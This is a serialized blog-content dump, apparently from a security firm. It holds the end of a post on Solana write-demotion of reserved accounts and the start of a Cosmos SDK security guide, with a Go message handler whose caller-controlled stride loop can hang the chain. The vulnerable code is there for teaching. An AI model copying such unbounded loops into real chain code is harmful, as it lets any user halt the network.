value":30402},{"type":27,"tag":207,"props":82735,"children":82736},{"style":214},[82737],{"type":33,"value":11009},{"type":27,"tag":207,"props":82739,"children":82740},{"style":238},[82741],{"type":33,"value":27530},{"type":27,"tag":207,"props":82743,"children":82744},{"class":209,"line":4095},[82745,82749,82753,82757,82761,82765,82769],{"type":27,"tag":207,"props":82746,"children":82747},{"style":214},[82748],{"type":33,"value":28115},{"type":27,"tag":207,"props":82750,"children":82751},{"style":220},[82752],{"type":33,"value":49486},{"type":27,"tag":207,"props":82754,"children":82755},{"style":226},[82756],{"type":33,"value":736},{"type":27,"tag":207,"props":82758,"children":82759},{"style":8920},[82760],{"type":33,"value":30431},{"type":27,"tag":207,"props":82762,"children":82763},{"style":238},[82764],{"type":33,"value":30195},{"type":27,"tag":207,"props":82766,"children":82767},{"style":8920},[82768],{"type":33,"value":30200},{"type":27,"tag":207,"props":82770,"children":82771},{"style":238},[82772],{"type":33,"value":13420},{"type":27,"tag":207,"props":82774,"children":82775},{"class":209,"line":4103},[82776],{"type":27,"tag":207,"props":82777,"children":82778},{"style":238},[82779],{"type":33,"value":451},{"type":27,"tag":36,"props":82781,"children":82782},{},[82783,82785,82791,82793,82799],{"type":33,"value":82784},"This works fine — until one day, ",{"type":27,"tag":84,"props":82786,"children":82788},{"className":82787},[],[82789],{"type":33,"value":82790},"old_king",{"type":33,"value":82792}," is silently demoted. Suddenly, the ",{"type":27,"tag":84,"props":82794,"children":82796},{"className":82795},[],[82797],{"type":33,"value":82798},"#[account(mut)]",{"type":33,"value":82800}," constraint fails, and your program is bricked. Even though you're passing a writable account in the transaction, the runtime has made a unilateral decision to override that.",{"type":27,"tag":26163,"props":82802,"children":82804},{"id":82803},"real-world-example-write-demotion-with-secp256r1_program",[82805,82807],{"type":33,"value":82806},"Real-World Example: Write-Demotion with ",{"type":27,"tag":84,"props":82808,"children":82810},{"className":82809},[],[82811],{"type":33,"value":82812},"secp256r1_program",{"type":27,"tag":36,"props":82814,"children":82815},{},[82816,82818,82823],{"type":33,"value":82817},"Here’s a concrete example of the write-demotion trap playing out on mainnet — involving ",{"type":27,"tag":84,"props":82819,"children":82821},{"className":82820},[],[82822],{"type":33,"value":82812},{"type":33,"value":82824},", a precompiled program gated behind a feature flag:",{"type":27,"tag":101,"props":82826,"children":82828},{"className":10270,"code":82827,"language":10269,"meta":7,"style":7},"ReservedAccount::new_pending(\n secp256r1_program::id(),\n feature_set::enable_secp256r1_precompile::id(),\n)\n",[82829],{"type":27,"tag":84,"props":82830,"children":82831},{"__ignoreMap":7},[82832,82853,82873,82902],{"type":27,"tag":207,"props":82833,"children":82834},{"class":209,"line":210},[82835,82840,82844,82849],{"type":27,"tag":207,"props":82836,"children":82837},{"style":8920},[82838],{"type":33,"value":82839},"ReservedAccount",{"type":27,"tag":207,"props":82841,"children":82842},{"style":226},[82843],{"type":33,"value":10768},{"type":27,"tag":207,"props":82845,"children":82846},{"style":1335},[82847],{"type":33,"value":82848},"new_pending",{"type":27,"tag":207,"props":82850,"children":82851},{"style":238},[82852],{"type":33,"value":9090},{"type":27,"tag":207,"props":82854,"children":82855},{"class":209,"line":244},[82856,82861,82865,82869],{"type":27,"tag":207,"props":82857,"children":82858},{"style":238},[82859],{"type":33,"value":82860}," secp256r1_program",{"type":27,"tag":207,"props":82862,"children":82863},{"style":226},[82864],{"type":33,"value":10768},{"type":27,"tag":207,"props":82866,"children":82867},{"style":1335},[82868],{"type":33,"value":10773},{"type":27,"tag":207,"props":82870,"children":82871},{"style":238},[82872],{"type":33,"value":10778},{"type":27,"tag":207,"props":82874,"children":82875},{"class":209,"line":270},[82876,82881,82885,82890,82894,82898],{"type":27,"tag":207,"props":82877,"children":82878},{"style":238},[82879],{"type":33,"value":82880}," feature_set",{"type":27,"tag":207,"props":82882,"children":82883},{"style":226},[82884],{"type":33,"value":10768},{"type":27,"tag":207,"props":82886,"children":82887},{"style":238},[82888],{"type":33,"value":82889},"enable_secp256r1_precompile",{"type":27,"tag":207,"props":82891,"children":82892},{"style":226},[82893],{"type":33,"value":10768},{"type":27,"tag":207,"props":82895,"children":82896},{"style":1335},[82897],{"type":33,"value":10773},{"type":27,"tag":207,"props":82899,"children":82900},{"style":238},[82901],{"type":33,"value":10778},{"type":27,"tag":207,"props":82903,"children":82904},{"class":209,"line":296},[82905],{"type":27,"tag":207,"props":82906,"children":82907},{"style":238},[82908],{"type":33,"value":10449},{"type":27,"tag":36,"props":82910,"children":82911},{},[82912,82914,82919,82921,82927],{"type":33,"value":82913},"Before the ",{"type":27,"tag":84,"props":82915,"children":82917},{"className":82916},[],[82918],{"type":33,"value":82889},{"type":33,"value":82920}," feature is activated, this account behaves like any ordinary one. You can assign ",{"type":27,"tag":84,"props":82922,"children":82924},{"className":82923},[],[82925],{"type":33,"value":82926},"secp256r1_program::id()",{"type":33,"value":82928}," as the king in a contract.",{"type":27,"tag":36,"props":82930,"children":82931},{},[82932,82934,82939],{"type":33,"value":82933},"But once the feature is flipped on, the runtime silently marks it as read-only, blocking any future writes. As a result, ",{"type":27,"tag":84,"props":82935,"children":82937},{"className":82936},[],[82938],{"type":33,"value":82926},{"type":33,"value":82940}," becomes the eternal king, and no one can dethrone it.",{"type":27,"tag":26163,"props":82942,"children":82944},{"id":82943},"fix-3-preventing-write-demotion-pitfalls",[82945],{"type":33,"value":82946},"Fix 3: Preventing Write-Demotion Pitfalls",{"type":27,"tag":36,"props":82948,"children":82949},{},[82950,82952,82957],{"type":33,"value":82951},"Alright, let’s try to fix this ",{"type":27,"tag":942,"props":82953,"children":82954},{},[82955],{"type":33,"value":82956},"yet another",{"type":33,"value":82958}," edge case — and hopefully close the book on it.",{"type":27,"tag":26163,"props":82960,"children":82962},{"id":82961},"attempt-1-block-known-reserved-accounts",[82963],{"type":33,"value":82964},"Attempt 1: Block Known Reserved Accounts",{"type":27,"tag":36,"props":82966,"children":82967},{},[82968],{"type":33,"value":82969},"One naive solution is to reject any known reserved account, for example:",{"type":27,"tag":101,"props":82971,"children":82973},{"className":47605,"code":82972,"language":47607,"meta":7,"style":7}," pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n+ assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",[82974],{"type":27,"tag":84,"props":82975,"children":82976},{"__ignoreMap":7},[82977,82985],{"type":27,"tag":207,"props":82978,"children":82979},{"class":209,"line":210},[82980],{"type":27,"tag":207,"props":82981,"children":82982},{"style":238},[82983],{"type":33,"value":82984}," pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n",{"type":27,"tag":207,"props":82986,"children":82987},{"class":209,"line":244},[82988],{"type":27,"tag":207,"props":82989,"children":82990},{"style":232},[82991],{"type":33,"value":82992},"+ assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",{"type":27,"tag":36,"props":82994,"children":82995},{},[82996,82998,83003],{"type":33,"value":82997},"This works in the short term, but doesn’t scale — you can’t predict all future additions to the ",{"type":27,"tag":84,"props":82999,"children":83001},{"className":83000},[],[83002],{"type":33,"value":82839},{"type":33,"value":83004}," list. The moment a new reserved account is introduced, your program becomes vulnerable again.",{"type":27,"tag":26163,"props":83006,"children":83008},{"id":83007},"attempt-2-use-a-pda-vault",[83009],{"type":33,"value":83010},"Attempt 2: Use a PDA Vault",{"type":27,"tag":36,"props":83012,"children":83013},{},[83014,83016,83021],{"type":33,"value":83015},"A more future-proof fix is to avoid ",{"type":27,"tag":12606,"props":83017,"children":83018},{},[83019],{"type":33,"value":83020},"transferring lamports to arbitrary accounts",{"type":33,"value":83022}," altogether.",{"type":27,"tag":36,"props":83024,"children":83025},{},[83026],{"type":33,"value":83027},"A clean approach would be to store the refund lamports in a PDA vault owned by your program. This prevents your logic from depending on accounts you don’t have complete control over, and sidesteps any risk of write-demotion or future account restrictions.",{"type":27,"tag":28,"props":83029,"children":83031},{"id":83030},"final-thoughts",[83032],{"type":33,"value":83033},"Final Thoughts",{"type":27,"tag":36,"props":83035,"children":83036},{},[83037],{"type":33,"value":83038},"Transferring lamports on Solana is not always straightforward and carries potential risks. Account constraints alone are insufficient to ensure safety, especially when dealing with runtime-specific edge cases.",{"type":27,"tag":36,"props":83040,"children":83041},{},[83042],{"type":33,"value":83043},"We can safely transfer lamports to an account under the following conditions:",{"type":27,"tag":1228,"props":83045,"children":83046},{},[83047,83052,83057],{"type":27,"tag":1232,"props":83048,"children":83049},{},[83050],{"type":33,"value":83051},"It's not executable.",{"type":27,"tag":1232,"props":83053,"children":83054},{},[83055],{"type":33,"value":83056},"Its balance, after the transfer, remains rent-exempt.",{"type":27,"tag":1232,"props":83058,"children":83059},{},[83060],{"type":33,"value":83061},"It's not a reserved account.",{"type":27,"tag":36,"props":83063,"children":83064},{},[83065],{"type":33,"value":83066},"This issue is not purely theoretical; it has impacted real-world programs. One significant case was recently reported to Jito via the bug bounty, which could have resulted in incorrect tip payments.",{"type":27,"tag":10127,"props":83068,"children":83069},{},[83070],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":83072},[83073,83074,83075,83081],{"id":30,"depth":244,"text":34},{"id":78456,"depth":244,"text":78459},{"id":79562,"depth":244,"text":79565,"children":83076},[83077,83078,83080],{"id":79568,"depth":270,"text":79571},{"id":80255,"depth":270,"text":83079},"Bug 2: Writable but Untouchable — set_lamports Fails",{"id":81560,"depth":270,"text":81563},{"id":83030,"depth":244,"text":83033},"content:blog:2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol",{"_path":83086,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":83087,"description":83088,"date":83089,"author":83090,"image":83091,"isFeatured":19,"onBlogPage":19,"tags":83093,"body":83096,"_type":10152,"_id":96967,"_source":10154,"_file":96968,"_stem":96969,"_extension":10157},"/blog/2025-06-10-cosmos-security","Cosmos Security: An Otter's Guide","From infinite loops and map determinism to AnteHandler missteps and storage key collisions, we highlight real-world vulnerabilities and actionable advice for building safer Cosmos-based projects.","2025-06-10","james",{"src":83092,"width":18,"height":18},"/posts/cosmos-security/title.png",[83094,83095],"cosmos-sdk","security",{"type":24,"children":83097,"toc":96945},[83098,83102,83107,83112,83118,83123,83128,83133,83394,83881,83900,83905,83910,83915,83921,83926,83961,83971,84478,84498,84511,84517,84522,84527,84768,84773,84781,84793,85155,85160,85165,85201,85210,85636,85657,85663,85683,85704,85723,85755,85767,85779,86433,86461,86470,86910,86937,86957,86962,86983,87032,87041,88265,88293,88299,88304,88309,88329,88616,88650,88831,88836,88841,88885,88894,90086,90337,90350,90356,90390,90395,90458,90463,90483,90502,90514,90533,91225,91230,91235,91263,91272,92157,92184,92190,92210,92215,92228,92402,92415,92506,92511,92519,92529,92679,92684,92704,92712,92717,93115,93127,93132,93172,93183,93203,93511,93516,94441,94453,94461,94466,95457,95462,95474,95494,95513,96427,96483,96589,96601,96606,96611,96639,96648,96874,96900,96913,96927,96931,96936,96941],{"type":27,"tag":28,"props":83099,"children":83100},{"id":30},[83101],{"type":33,"value":34},{"type":27,"tag":36,"props":83103,"children":83104},{},[83105],{"type":33,"value":83106},"The Cosmos SDK is an \"L1 toolkit\" for developers. It provides an open-source tool that enhances the ability to build application-specific L1 chains, all while prioritizing flexibility and control over the entire runtime environment. Unfortunately, with the convenience of the Cosmos SDK, security can be an oversight.",{"type":27,"tag":36,"props":83108,"children":83109},{},[83110],{"type":33,"value":83111},"In this comprehensive blog post, we break down security issues that are often overseen by developers, supported by real-world examples from live projects. Our goal is to provide a practical exploration of security vulnerabilities while also offering insights on how developers can identify and address these issues on their own.",{"type":27,"tag":28,"props":83113,"children":83115},{"id":83114},"its-loopin-time",[83116],{"type":33,"value":83117},"It's Loopin' Time",{"type":27,"tag":36,"props":83119,"children":83120},{},[83121],{"type":33,"value":83122},"There are notable differences in building app-specific L1s using the SDK and building contracts on established L1 chains. It is especially crucial to recognize that maintaining the stability of a blockchain is dependent on the developer.",{"type":27,"tag":36,"props":83124,"children":83125},{},[83126],{"type":33,"value":83127},"Below, we begin to demonstrate the differences between writing smart contracts with Solidity vs developing L1 with the Cosmos SDK.",{"type":27,"tag":36,"props":83129,"children":83130},{},[83131],{"type":33,"value":83132},"Here is a simple example for reference:",{"type":27,"tag":101,"props":83134,"children":83136},{"code":83135,"language":11757,"meta":7,"className":11758,"style":7},"function sumWithStride(\n uint64 start,\n uint64 stride,\n uint64[] memory arr\n) public returns (uint64) {\n uint64 idx = start;\n uint64 sum = 0;\n uint64 end = arr.length;\n\n while (idx \u003C end) {\n sum += arr[idx];\n idx += stride;\n }\n return sum;\n}\n",[83137],{"type":27,"tag":84,"props":83138,"children":83139},{"__ignoreMap":7},[83140,83156,83173,83189,83211,83240,83261,83285,83306,83313,83334,83351,83368,83375,83387],{"type":27,"tag":207,"props":83141,"children":83142},{"class":209,"line":210},[83143,83147,83152],{"type":27,"tag":207,"props":83144,"children":83145},{"style":214},[83146],{"type":33,"value":38637},{"type":27,"tag":207,"props":83148,"children":83149},{"style":1335},[83150],{"type":33,"value":83151}," sumWithStride",{"type":27,"tag":207,"props":83153,"children":83154},{"style":238},[83155],{"type":33,"value":9090},{"type":27,"tag":207,"props":83157,"children":83158},{"class":209,"line":244},[83159,83164,83169],{"type":27,"tag":207,"props":83160,"children":83161},{"style":8920},[83162],{"type":33,"value":83163}," uint64",{"type":27,"tag":207,"props":83165,"children":83166},{"style":220},[83167],{"type":33,"value":83168}," start",{"type":27,"tag":207,"props":83170,"children":83171},{"style":238},[83172],{"type":33,"value":1842},{"type":27,"tag":207,"props":83174,"children":83175},{"class":209,"line":270},[83176,83180,83185],{"type":27,"tag":207,"props":83177,"children":83178},{"style":8920},[83179],{"type":33,"value":83163},{"type":27,"tag":207,"props":83181,"children":83182},{"style":220},[83183],{"type":33,"value":83184}," stride",{"type":27,"tag":207,"props":83186,"children":83187},{"style":238},[83188],{"type":33,"value":1842},{"type":27,"tag":207,"props":83190,"children":83191},{"class":209,"line":296},[83192,83196,83201,83206],{"type":27,"tag":207,"props":83193,"children":83194},{"style":8920},[83195],{"type":33,"value":83163},{"type":27,"tag":207,"props":83197,"children":83198},{"style":238},[83199],{"type":33,"value":83200},"[] ",{"type":27,"tag":207,"props":83202,"children":83203},{"style":214},[83204],{"type":33,"value":83205},"memory",{"type":27,"tag":207,"props":83207,"children":83208},{"style":220},[83209],{"type":33,"value":83210}," arr\n",{"type":27,"tag":207,"props":83212,"children":83213},{"class":209,"line":445},[83214,83218,83222,83227,83231,83236],{"type":27,"tag":207,"props":83215,"children":83216},{"style":238},[83217],{"type":33,"value":2222},{"type":27,"tag":207,"props":83219,"children":83220},{"style":214},[83221],{"type":33,"value":68907},{"type":27,"tag":207,"props":83223,"children":83224},{"style":376},[83225],{"type":33,"value":83226}," returns",{"type":27,"tag":207,"props":83228,"children":83229},{"style":238},[83230],{"type":33,"value":686},{"type":27,"tag":207,"props":83232,"children":83233},{"style":8920},[83234],{"type":33,"value":83235},"uint64",{"type":27,"tag":207,"props":83237,"children":83238},{"style":238},[83239],{"type":33,"value":1424},{"type":27,"tag":207,"props":83241,"children":83242},{"class":209,"line":867},[83243,83247,83252,83256],{"type":27,"tag":207,"props":83244,"children":83245},{"style":8920},[83246],{"type":33,"value":83163},{"type":27,"tag":207,"props":83248,"children":83249},{"style":238},[83250],{"type":33,"value":83251}," idx ",{"type":27,"tag":207,"props":83253,"children":83254},{"style":226},[83255],{"type":33,"value":10380},{"type":27,"tag":207,"props":83257,"children":83258},{"style":238},[83259],{"type":33,"value":83260}," start;\n",{"type":27,"tag":207,"props":83262,"children":83263},{"class":209,"line":892},[83264,83268,83273,83277,83281],{"type":27,"tag":207,"props":83265,"children":83266},{"style":8920},[83267],{"type":33,"value":83163},{"type":27,"tag":207,"props":83269,"children":83270},{"style":238},[83271],{"type":33,"value":83272}," sum ",{"type":27,"tag":207,"props":83274,"children":83275},{"style":226},[83276],{"type":33,"value":10380},{"type":27,"tag":207,"props":83278,"children":83279},{"style":232},[83280],{"type":33,"value":4680},{"type":27,"tag":207,"props":83282,"children":83283},{"style":238},[83284],{"type":33,"value":241},{"type":27,"tag":207,"props":83286,"children":83287},{"class":209,"line":1475},[83288,83292,83297,83301],{"type":27,"tag":207,"props":83289,"children":83290},{"style":8920},[83291],{"type":33,"value":83163},{"type":27,"tag":207,"props":83293,"children":83294},{"style":238},[83295],{"type":33,"value":83296}," end ",{"type":27,"tag":207,"props":83298,"children":83299},{"style":226},[83300],{"type":33,"value":10380},{"type":27,"tag":207,"props":83302,"children":83303},{"style":238},[83304],{"type":33,"value":83305}," arr.length;\n",{"type":27,"tag":207,"props":83307,"children":83308},{"class":209,"line":2065},[83309],{"type":27,"tag":207,"props":83310,"children":83311},{"emptyLinePlaceholder":19},[83312],{"type":33,"value":2062},{"type":27,"tag":207,"props":83314,"children":83315},{"class":209,"line":2092},[83316,83320,83325,83329],{"type":27,"tag":207,"props":83317,"children":83318},{"style":376},[83319],{"type":33,"value":71606},{"type":27,"tag":207,"props":83321,"children":83322},{"style":238},[83323],{"type":33,"value":83324}," (idx ",{"type":27,"tag":207,"props":83326,"children":83327},{"style":226},[83328],{"type":33,"value":9257},{"type":27,"tag":207,"props":83330,"children":83331},{"style":238},[83332],{"type":33,"value":83333}," end) {\n",{"type":27,"tag":207,"props":83335,"children":83336},{"class":209,"line":2130},[83337,83342,83346],{"type":27,"tag":207,"props":83338,"children":83339},{"style":238},[83340],{"type":33,"value":83341}," sum ",{"type":27,"tag":207,"props":83343,"children":83344},{"style":226},[83345],{"type":33,"value":75671},{"type":27,"tag":207,"props":83347,"children":83348},{"style":238},[83349],{"type":33,"value":83350}," arr[idx];\n",{"type":27,"tag":207,"props":83352,"children":83353},{"class":209,"line":2168},[83354,83359,83363],{"type":27,"tag":207,"props":83355,"children":83356},{"style":238},[83357],{"type":33,"value":83358}," idx ",{"type":27,"tag":207,"props":83360,"children":83361},{"style":226},[83362],{"type":33,"value":75671},{"type":27,"tag":207,"props":83364,"children":83365},{"style":238},[83366],{"type":33,"value":83367}," stride;\n",{"type":27,"tag":207,"props":83369,"children":83370},{"class":209,"line":4095},[83371],{"type":27,"tag":207,"props":83372,"children":83373},{"style":238},[83374],{"type":33,"value":10645},{"type":27,"tag":207,"props":83376,"children":83377},{"class":209,"line":4103},[83378,83382],{"type":27,"tag":207,"props":83379,"children":83380},{"style":376},[83381],{"type":33,"value":8986},{"type":27,"tag":207,"props":83383,"children":83384},{"style":238},[83385],{"type":33,"value":83386}," sum;\n",{"type":27,"tag":207,"props":83388,"children":83389},{"class":209,"line":4154},[83390],{"type":27,"tag":207,"props":83391,"children":83392},{"style":238},[83393],{"type":33,"value":451},{"type":27,"tag":101,"props":83395,"children":83399},{"code":83396,"language":83397,"meta":7,"className":83398,"style":7},"type MsgSumWithStrideParams struct {\n Start uint64\n Stride uint64\n Arr []uint64\n}\n\ntype MsgSumWithStrideResponse struct {\n Sum uint64\n}\n\nfunc (ms msgServer) SumWithStride(\n goCtx context.Context,\n msg *MsgSumWithStrideParams,\n) (*MsgSumWithStrideResponse, error) {\n sum := uint64(0)\n end := uint64(len(msg.Arr))\n for idx := msg.Start; idx \u003C end; idx += msg.Stride {\n sum += msg.Arr[idx]\n }\n return &MsgSumWithStrideResponse{Sum: sum}, nil\n}\n","go","language-go shiki shiki-themes slack-dark",[83400],{"type":27,"tag":84,"props":83401,"children":83402},{"__ignoreMap":7},[83403,83423,83436,83448,83466,83473,83480,83500,83512,83519,83526,83560,83586,83607,83636,83666,83711,83788,83824,83831,83874],{"type":27,"tag":207,"props":83404,"children":83405},{"class":209,"line":210},[83406,83410,83415,83419],{"type":27,"tag":207,"props":83407,"children":83408},{"style":214},[83409],{"type":33,"value":40014},{"type":27,"tag":207,"props":83411,"children":83412},{"style":8920},[83413],{"type":33,"value":83414}," MsgSumWithStrideParams",{"type":27,"tag":207,"props":83416,"children":83417},{"style":214},[83418],{"type":33,"value":28423},{"type":27,"tag":207,"props":83420,"children":83421},{"style":238},[83422],{"type":33,"value":384},{"type":27,"tag":207,"props":83424,"children":83425},{"class":209,"line":244},[83426,83431],{"type":27,"tag":207,"props":83427,"children":83428},{"style":220},[83429],{"type":33,"value":83430}," Start",{"type":27,"tag":207,"props":83432,"children":83433},{"style":8920},[83434],{"type":33,"value":83435}," uint64\n",{"type":27,"tag":207,"props":83437,"children":83438},{"class":209,"line":270},[83439,83444],{"type":27,"tag":207,"props":83440,"children":83441},{"style":220},[83442],{"type":33,"value":83443}," Stride",{"type":27,"tag":207,"props":83445,"children":83446},{"style":8920},[83447],{"type":33,"value":83435},{"type":27,"tag":207,"props":83449,"children":83450},{"class":209,"line":296},[83451,83456,83461],{"type":27,"tag":207,"props":83452,"children":83453},{"style":220},[83454],{"type":33,"value":83455}," Arr",{"type":27,"tag":207,"props":83457,"children":83458},{"style":238},[83459],{"type":33,"value":83460}," []",{"type":27,"tag":207,"props":83462,"children":83463},{"style":8920},[83464],{"type":33,"value":83465},"uint64\n",{"type":27,"tag":207,"props":83467,"children":83468},{"class":209,"line":445},[83469],{"type":27,"tag":207,"props":83470,"children":83471},{"style":238},[83472],{"type":33,"value":451},{"type":27,"tag":207,"props":83474,"children":83475},{"class":209,"line":867},[83476],{"type":27,"tag":207,"props":83477,"children":83478},{"emptyLinePlaceholder":19},[83479],{"type":33,"value":2062},{"type":27,"tag":207,"props":83481,"children":83482},{"class":209,"line":892},[83483,83487,83492,83496],{"type":27,"tag":207,"props":83484,"children":83485},{"style":214},[83486],{"type":33,"value":40014},{"type":27,"tag":207,"props":83488,"children":83489},{"style":8920},[83490],{"type":33,"value":83491}," MsgSumWithStrideResponse",{"type":27,"tag":207,"props":83493,"children":83494},{"style":214},[83495],{"type":33,"value":28423},{"type":27,"tag":207,"props":83497,"children":83498},{"style":238},[83499],{"type":33,"value":384},{"type":27,"tag":207,"props":83501,"children":83502},{"class":209,"line":1475},[83503,83508],{"type":27,"tag":207,"props":83504,"children":83505},{"style":220},[83506],{"type":33,"value":83507}," Sum",{"type":27,"tag":207,"props":83509,"children":83510},{"style":8920},[83511],{"type":33,"value":83435},{"type":27,"tag":207,"props":83513,"children":83514},{"class":209,"line":2065},[83515],{"type":27,"tag":207,"props":83516,"children":83517},{"style":238},[83518],{"type":33,"value":451},{"type":27,"tag":207,"props":83520,"children":83521},{"class":209,"line":2092},[83522],{"type":27,"tag":207,"props":83523,"children":83524},{"emptyLinePlaceholder":19},[83525],{"type":33,"value":2062},{"type":27,"tag":207,"props":83527,"children":83528},{"class":209,"line":2130},[83529,83533,83537,83542,83547,83551,83556],{"type":27,"tag":207,"props":83530,"children":83531},{"style":214},[83532],{"type":33,"value":2085},{"type":27,"tag":207,"props":83534,"children":83535},{"style":238},[83536],{"type":33,"value":686},{"type":27,"tag":207,"props":83538,"children":83539},{"style":220},[83540],{"type":33,"value":83541},"ms ",{"type":27,"tag":207,"props":83543,"children":83544},{"style":8920},[83545],{"type":33,"value":83546},"msgServer",{"type":27,"tag":207,"props":83548,"children":83549},{"style":238},[83550],{"type":33,"value":2222},{"type":27,"tag":207,"props":83552,"children":83553},{"style":1335},[83554],{"type":33,"value":83555},"SumWithStride",{"type":27,"tag":207,"props":83557,"children":83558},{"style":238},[83559],{"type":33,"value":9090},{"type":27,"tag":207,"props":83561,"children":83562},{"class":209,"line":2168},[83563,83568,83573,83577,83582],{"type":27,"tag":207,"props":83564,"children":83565},{"style":220},[83566],{"type":33,"value":83567}," goCtx",{"type":27,"tag":207,"props":83569,"children":83570},{"style":8920},[83571],{"type":33,"value":83572}," context",{"type":27,"tag":207,"props":83574,"children":83575},{"style":238},[83576],{"type":33,"value":1041},{"type":27,"tag":207,"props":83578,"children":83579},{"style":8920},[83580],{"type":33,"value":83581},"Context",{"type":27,"tag":207,"props":83583,"children":83584},{"style":238},[83585],{"type":33,"value":1842},{"type":27,"tag":207,"props":83587,"children":83588},{"class":209,"line":4095},[83589,83594,83598,83603],{"type":27,"tag":207,"props":83590,"children":83591},{"style":220},[83592],{"type":33,"value":83593}," msg",{"type":27,"tag":207,"props":83595,"children":83596},{"style":226},[83597],{"type":33,"value":17093},{"type":27,"tag":207,"props":83599,"children":83600},{"style":8920},[83601],{"type":33,"value":83602},"MsgSumWithStrideParams",{"type":27,"tag":207,"props":83604,"children":83605},{"style":238},[83606],{"type":33,"value":1842},{"type":27,"tag":207,"props":83608,"children":83609},{"class":209,"line":4103},[83610,83615,83619,83624,83628,83632],{"type":27,"tag":207,"props":83611,"children":83612},{"style":238},[83613],{"type":33,"value":83614},") (",{"type":27,"tag":207,"props":83616,"children":83617},{"style":226},[83618],{"type":33,"value":9286},{"type":27,"tag":207,"props":83620,"children":83621},{"style":8920},[83622],{"type":33,"value":83623},"MsgSumWithStrideResponse",{"type":27,"tag":207,"props":83625,"children":83626},{"style":238},[83627],{"type":33,"value":1123},{"type":27,"tag":207,"props":83629,"children":83630},{"style":8920},[83631],{"type":33,"value":22138},{"type":27,"tag":207,"props":83633,"children":83634},{"style":238},[83635],{"type":33,"value":1424},{"type":27,"tag":207,"props":83637,"children":83638},{"class":209,"line":4154},[83639,83644,83649,83654,83658,83662],{"type":27,"tag":207,"props":83640,"children":83641},{"style":220},[83642],{"type":33,"value":83643}," sum",{"type":27,"tag":207,"props":83645,"children":83646},{"style":226},[83647],{"type":33,"value":83648}," :=",{"type":27,"tag":207,"props":83650,"children":83651},{"style":8920},[83652],{"type":33,"value":83653}," uint64",{"type":27,"tag":207,"props":83655,"children":83656},{"style":238},[83657],{"type":33,"value":1343},{"type":27,"tag":207,"props":83659,"children":83660},{"style":232},[83661],{"type":33,"value":1660},{"type":27,"tag":207,"props":83663,"children":83664},{"style":238},[83665],{"type":33,"value":10449},{"type":27,"tag":207,"props":83667,"children":83668},{"class":209,"line":4203},[83669,83674,83678,83682,83686,83690,83694,83698,83702,83707],{"type":27,"tag":207,"props":83670,"children":83671},{"style":220},[83672],{"type":33,"value":83673}," end",{"type":27,"tag":207,"props":83675,"children":83676},{"style":226},[83677],{"type":33,"value":83648},{"type":27,"tag":207,"props":83679,"children":83680},{"style":8920},[83681],{"type":33,"value":83653},{"type":27,"tag":207,"props":83683,"children":83684},{"style":238},[83685],{"type":33,"value":1343},{"type":27,"tag":207,"props":83687,"children":83688},{"style":1335},[83689],{"type":33,"value":16416},{"type":27,"tag":207,"props":83691,"children":83692},{"style":238},[83693],{"type":33,"value":1343},{"type":27,"tag":207,"props":83695,"children":83696},{"style":220},[83697],{"type":33,"value":65179},{"type":27,"tag":207,"props":83699,"children":83700},{"style":238},[83701],{"type":33,"value":1041},{"type":27,"tag":207,"props":83703,"children":83704},{"style":220},[83705],{"type":33,"value":83706},"Arr",{"type":27,"tag":207,"props":83708,"children":83709},{"style":238},[83710],{"type":33,"value":26983},{"type":27,"tag":207,"props":83712,"children":83713},{"class":209,"line":4249},[83714,83718,83723,83727,83732,83736,83741,83745,83750,83754,83759,83763,83767,83771,83775,83779,83784],{"type":27,"tag":207,"props":83715,"children":83716},{"style":376},[83717],{"type":33,"value":10321},{"type":27,"tag":207,"props":83719,"children":83720},{"style":220},[83721],{"type":33,"value":83722}," idx",{"type":27,"tag":207,"props":83724,"children":83725},{"style":226},[83726],{"type":33,"value":83648},{"type":27,"tag":207,"props":83728,"children":83729},{"style":220},[83730],{"type":33,"value":83731}," msg",{"type":27,"tag":207,"props":83733,"children":83734},{"style":238},[83735],{"type":33,"value":1041},{"type":27,"tag":207,"props":83737,"children":83738},{"style":220},[83739],{"type":33,"value":83740},"Start",{"type":27,"tag":207,"props":83742,"children":83743},{"style":238},[83744],{"type":33,"value":4685},{"type":27,"tag":207,"props":83746,"children":83747},{"style":220},[83748],{"type":33,"value":83749},"idx",{"type":27,"tag":207,"props":83751,"children":83752},{"style":226},[83753],{"type":33,"value":4695},{"type":27,"tag":207,"props":83755,"children":83756},{"style":220},[83757],{"type":33,"value":83758}," end",{"type":27,"tag":207,"props":83760,"children":83761},{"style":238},[83762],{"type":33,"value":4685},{"type":27,"tag":207,"props":83764,"children":83765},{"style":220},[83766],{"type":33,"value":83749},{"type":27,"tag":207,"props":83768,"children":83769},{"style":226},[83770],{"type":33,"value":22339},{"type":27,"tag":207,"props":83772,"children":83773},{"style":220},[83774],{"type":33,"value":83731},{"type":27,"tag":207,"props":83776,"children":83777},{"style":238},[83778],{"type":33,"value":1041},{"type":27,"tag":207,"props":83780,"children":83781},{"style":220},[83782],{"type":33,"value":83783},"Stride",{"type":27,"tag":207,"props":83785,"children":83786},{"style":238},[83787],{"type":33,"value":384},{"type":27,"tag":207,"props":83789,"children":83790},{"class":209,"line":4290},[83791,83796,83800,83804,83808,83812,83816,83820],{"type":27,"tag":207,"props":83792,"children":83793},{"style":220},[83794],{"type":33,"value":83795}," 